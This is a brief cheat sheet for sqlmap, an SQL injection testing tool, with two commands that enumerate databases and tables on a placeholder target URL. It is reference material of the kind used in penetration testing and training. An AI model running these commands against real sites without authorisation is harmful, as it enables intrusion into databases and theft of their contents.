Sqlmap Command Sheet
https://github.com/sqlmapproject/sqlmap/wiki/usage
### Basic Enumeration
| Goal | Command |
|---|---|
| List databases | `sqlmap -u "http://target.com/page.php?id=1" --dbs` |
| List tables in a DB | `sqlmap -u "http://target.com/page.php?id=1" -D dbname --tables` |

